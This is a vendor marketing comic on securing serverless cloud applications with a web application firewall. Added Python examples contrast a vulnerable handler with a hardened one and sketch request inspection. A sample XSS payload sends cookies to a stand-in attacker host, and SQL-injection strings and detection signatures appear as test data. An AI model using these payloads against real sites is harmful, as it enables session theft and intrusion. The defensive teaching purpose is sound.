PRESENTED BY:
[Figure: a datacenter hosting a web app and a database]
There was an executive decision to move some apps to the cloud.
We need to change how we develop new applications!
But if we are starting an application from scratch and using the public cloud, it makes sense to do it in the new way.
I'm responsible for the application's security.
But what are cloud-native applications?
You have a car, right?
[Figure: car-ownership cost table. Rows: acquisition, maintenance (plus overhead), per-mile cost, fixed cost no matter the usage, passengers (unlimited); relative cost shown on a $ to $$$$ scale]
Owning a server is like owning a car. So people started using cloud services instead of servers. This architecture is called serverless.
[Chart: traditional architecture (web servers, app servers, DB servers) vs. serverless. Cost plotted against usage for both, with the gap labelled "cost savings"; administrative overhead plotted against users for both]
Now I get it! The application is cloud native, using services, and not based in legacy architecture!
Correct!
[Figure: the application calls the API Gateway and other services]
Your work will be easy, right? If we are using cloud services, they will be responsible for the security.
No, we are still responsible for the cloud security. Remember the Shared Responsibility Model?
OWASP Top 10 Application Security Risks - 2017
A1: Injection
A2: Broken Authentication
A3: Sensitive Data Exposure
A4: XML External Entities (XXE)
A5: Broken Access Control
A6: Security Misconfiguration
A7: Cross-Site Scripting (XSS)
A8: Insecure Deserialization
A9: Using Components with Known Vulnerabilities
A10: Insufficient Logging & Monitoring
Let me show you an example.
[Figure sequence: a web application firewall sits between the attacker/users and the API Gateway and other services. Panels: (1) known attacks such as XSS, CSRF and injection are blocked by signatures, which receive updates; (2) IP intelligence services, with a geolocation database updated every 5 minutes, block botnet members, anonymous requests, anonymous proxies, scanners and restricted regions or countries; (3) legitimate traffic is validated by checking parameters, URIs, methods, size and pattern, so unknown behavior is flagged; (4) a credit card number such as 4321-1234-4321-1234 in a response is masked as XXXXXXXXXXXXXXXXXXXX before it leaves]
It was a challenge, but we finally have our cloud-native application deployed! And also protected!
BIG-IP VE Advanced Web Application Firewall
PROBLEM
When moving applications to the public cloud, security is still the #1 concern. Who is responsible when data is leaked or the application compromised?
That is why cloud providers use a Shared Responsibility Model: the customer is responsible for security IN the cloud, while the provider is responsible for the security OF the cloud. In a serverless model the provider patches the hosts and the runtime, but the function code, its input handling, the permissions it runs with and the data it returns remain the customer's responsibility.
In other words, companies are still responsible for the security of their applications, including cloud-native ones that leverage a serverless architecture.
These applications are still vulnerable to XSS, data exfiltration, DDoS attacks, etc.
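To make the point concrete that the cloud runtime does not remove application-level bugs, here is an added example (not code from this comic or from F5): the same serverless HTTP handler written twice, once reflecting user input straight into HTML and once output-encoding it. The event and response shape follows the AWS Lambda proxy integration (`event["queryStringParameters"]`, a dict with `statusCode`, `headers` and `body`); the handler names, the sample event and the payload are constructed for this example.

```python
"""Added example (not from the original comic or from F5): a reflected-XSS
bug in a serverless handler beside its hardened form.

Assumption: event/response shape mirrors the AWS Lambda proxy integration;
handler names, sample event and payload are constructed for illustration."""
import html
from typing import Optional


def _query_param(event: dict, name: str) -> str:
    # queryStringParameters is None (not {}) when the request has no query string
    params = event.get("queryStringParameters") or {}
    return params.get(name, "")


def greet_vulnerable(event: dict, context: Optional[object] = None) -> dict:
    # Reflects user input straight into an HTML response: a <script> payload
    # in the link executes in the browser of anyone who follows it. Nothing in
    # the serverless platform stops this; it is the customer's code.
    name = _query_param(event, "name")
    return {
        "statusCode": 200,
        "headers": {"Content-Type": "text/html"},
        "body": f"<h1>Hello {name}</h1>",
    }


def greet_hardened(event: dict, context: Optional[object] = None) -> dict:
    # Output-encode for the HTML context, bound the length, and add a CSP that
    # forbids inline script as a second layer should encoding ever be missed.
    name = html.escape(_query_param(event, "name")[:64], quote=True)
    return {
        "statusCode": 200,
        "headers": {
            "Content-Type": "text/html; charset=utf-8",
            "Content-Security-Policy": "default-src 'none'; script-src 'self'",
            "X-Content-Type-Options": "nosniff",
        },
        "body": f"<h1>Hello {name}</h1>",
    }


# Constructed sample event: an attacker-crafted query string that tries to
# exfiltrate the victim's cookie to an attacker-controlled host.
PAYLOAD = "<script>document.location='https://evil.example/?c='+document.cookie</script>"
SAMPLE_EVENT = {"queryStringParameters": {"name": PAYLOAD}}

if __name__ == "__main__":
    print(greet_vulnerable(SAMPLE_EVENT)["body"])
    print(greet_hardened(SAMPLE_EVENT)["body"])
```

The hardened version is what a code review of the vulnerable one should produce: encoding for the output context is the fix, and the CSP and `nosniff` headers limit the damage if a later change reintroduces the bug.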
ALTERNATIVES
Code reviews and a rigid security posture when developing cloud applications.
SOLUTION
Cloud-native applications rely on API calls to an API Gateway provided by the cloud provider. F5 Application Security Manager protects all calls made to the API Gateway, validating every request before it is passed on to the application itself.
F5 has been protecting applications and APIs for a long time and is recognized as a leader in this market. As a full-proxy solution that caches requests which would otherwise consume cloud resources, F5 can also improve performance and reduce usage bills.
[Figure: API protection. Requests from users and from an attacker are sent toward the API Gateway and the application.]
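The checks in the WAF figure earlier (IP intelligence, known-attack signatures, positive validation of parameters, URIs, methods and size, and masking of card numbers in responses) and the "validating every request before it is passed on" claim in the solution text above, as one added example. This is not F5 code and not the comic's; it is a minimal stand-in written for this page. The threat feed, geolocation table, URI rules, parameter rules and sample requests are all constructed (RFC 5737 documentation addresses, a placeholder country code "XX"), and a real feed would be refreshed on a schedule rather than hard-coded.

```python
"""Added example, not code from the comic or from F5: a minimal stand-in for
the request checks and response masking the WAF figure describes.
All tables and sample inputs below are constructed for illustration."""
import re
from dataclasses import dataclass
from typing import Dict, Optional

# --- IP intelligence (constructed feed; RFC 5737 documentation addresses) ---
BAD_IPS: Dict[str, str] = {"203.0.113.7": "botnet", "198.51.100.9": "anonymous_proxy"}
GEO_DB: Dict[str, str] = {"198.51.100.200": "XX", "192.0.2.10": "US"}  # "XX" = placeholder restricted region
BLOCKED_COUNTRIES = {"XX"}

# --- Positive security model: what legitimate traffic looks like (constructed) ---
ALLOWED_METHODS = {"GET", "POST"}
URI_RULES = {  # path pattern -> methods allowed on that path
    re.compile(r"^/orders/\d{1,10}$"): {"GET"},
    re.compile(r"^/orders$"): {"POST"},
}
PARAM_RULES = {"qty": re.compile(r"\d{1,3}"), "sku": re.compile(r"[A-Z0-9-]{1,20}")}
MAX_BODY_BYTES = 4096

# --- Negative security model: signatures for known attack patterns ---
SIGNATURES = [
    re.compile(r"<\s*script", re.IGNORECASE),                  # reflected XSS attempt
    re.compile(r"\b(or|and)\s+\d+\s*=\s*\d+", re.IGNORECASE),  # SQLi tautology (OR 1=1)
    re.compile(r"['\"]\s*;?\s*--"),                            # SQL comment right after a quote
]


@dataclass
class Request:
    src_ip: str
    method: str
    path: str
    params: Dict[str, str]
    body: str = ""


def classify_ip(ip: str) -> Optional[str]:
    """Block reason from the feed/geo tables, or None if the source looks clean."""
    if ip in BAD_IPS:
        return BAD_IPS[ip]
    if GEO_DB.get(ip) in BLOCKED_COUNTRIES:
        return "restricted_region"
    return None


def inspect(req: Request) -> Optional[str]:
    """None when the request may reach the API gateway, else the reason it was blocked."""
    ip_reason = classify_ip(req.src_ip)
    if ip_reason:
        return f"ip_intelligence:{ip_reason}"
    if req.method not in ALLOWED_METHODS:
        return "method"
    for pattern, methods in URI_RULES.items():      # URI must be a known one...
        if pattern.match(req.path):
            if req.method not in methods:           # ...and the method allowed on it
                return "method_for_uri"
            break
    else:
        return "unknown_uri"
    if len(req.body.encode()) > MAX_BODY_BYTES:
        return "size"
    for name, value in req.params.items():          # every parameter must be known and well-formed
        rule = PARAM_RULES.get(name)
        if rule is None:
            return f"unknown_param:{name}"
        if not rule.fullmatch(value):
            return f"param_pattern:{name}"
    haystack = [req.path, req.body, *req.params.values()]
    if any(sig.search(text) for sig in SIGNATURES for text in haystack):
        return "signature"
    return None


# --- Response data guard: mask card numbers in what the application returns ---
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, used to avoid masking order numbers that merely look like PANs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_cards(text: str) -> str:
    """Replace every digit of a Luhn-valid 13-19 digit run with X; leave other numbers alone."""
    def repl(m):
        digits = re.sub(r"\D", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            return re.sub(r"\d", "X", m.group(0))
        return m.group(0)
    return CARD_RE.sub(repl, text)


if __name__ == "__main__":
    print(inspect(Request("203.0.113.7", "GET", "/orders/42", {})))
    print(inspect(Request("192.0.2.10", "POST", "/orders", {}, "sku=A1' OR 1=1 --")))
    print(mask_cards("Credit Card Number 4321-1234-4321-1234"))
```

Two design points worth noting. The positive checks (known URI, allowed method, known parameters matching their patterns, bounded size) run before the signature list, which is why the positive model catches a `<script>` in a numeric field without any signature at all; the signatures only have to cover the free-text places the positive model cannot fully describe. The Luhn check keeps the masking from eating every 16-digit order or tracking number; the comic's own sample number happens to pass it. Keeping the last four digits visible, rather than masking all of them as the figure does, is the usual variant when support staff need to identify a card.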